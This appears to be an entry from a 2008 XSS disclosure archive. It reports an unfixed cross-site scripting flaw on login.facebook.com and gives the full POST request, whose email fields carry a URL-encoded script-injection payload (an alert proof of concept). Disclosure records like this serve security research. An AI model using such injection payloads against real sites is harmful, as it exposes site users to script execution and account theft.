Security researcher mox, has submitted on 04/04/2008 a cross-site-scripting (XSS) vulnerability affecting login.facebook.com, which at the time of submission ranked 6 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/04/2008 |
Date published: 06/04/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: mox |
Domain: login.facebook.com |
Category: XSS |
Pagerank: 6 |
URL: https://login.facebook.com/alogin.php |
POST: gray=2&oid=11071036546&hash=2a1a85b86951a99d8a376ec0400c5438&invid=&key=&emailAddr=%22%2F%3E%3Cscrip t%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&password=&next=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcr eate.php&email=%22%2F%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&account_choices_b=login_b &pass=&login=Login®_passwd__=&birthday_month=-1&birthday_day=-1&birthday_year=-1&captcha_challeng e_code=1207270527-8ef60f052b72f35061459844fe710bbe&recaptcha_challenge_field=02pQMAUhC8qcZagshraEb_D 7b1XAPetOBN9kJPdQ2tfiVu8MsKbZcF5Y9eaL_iFJBduj_c_4xdu0AF76h1XN-otxDOoxwyS0V5PskdH7VzDB2yBbM1bvJ0mj9kk 8Qbv3MVbo104Gg0fI3l4mNV1aF8TDF0g3dQdOReaUxqDBv8FeKG1DYqAwMD&captcha_response= |
Click here to view the mirror
|
|
|